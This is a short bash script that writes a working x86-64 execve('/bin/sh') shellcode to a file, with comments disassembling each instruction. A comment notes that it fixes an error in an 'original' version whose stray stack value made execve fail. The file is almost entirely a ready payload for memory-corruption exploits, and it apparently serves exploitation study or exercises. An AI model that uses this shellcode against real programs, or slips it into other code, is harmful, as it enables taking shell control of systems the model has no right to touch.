#!/bin/bash
echo -e "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05" > shellcode

# This shellcode translates as follows:
#
#  "\x48\x31\xd2"                             // xor %rdx, %rdx
#  "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622f2f, %rbx
#  "\x48\xc1\xeb\x08"                         // shr $0x8, %rbx
#  "\x53"                                     // push %rbx 
#  "\x48\x89\xe7"                             // mov %rsp, %rdi
#  "\x52"                                     // push %rdx      // There is an error in the "original", push %rax will push
#                                                               // some random stuff on the stack, instead of NULL, which will 
#                                                               // cause the execve to fail with EFAULT (-14). See man execve.
#  "\x57"                                     // push %rdi
#  "\x48\x89\xe6"                             // mov %rsp, %rsi
#  "\xb0\x3b"                                 // mov $0x3b, %al
#  "\x0f\x05"                                 // syscall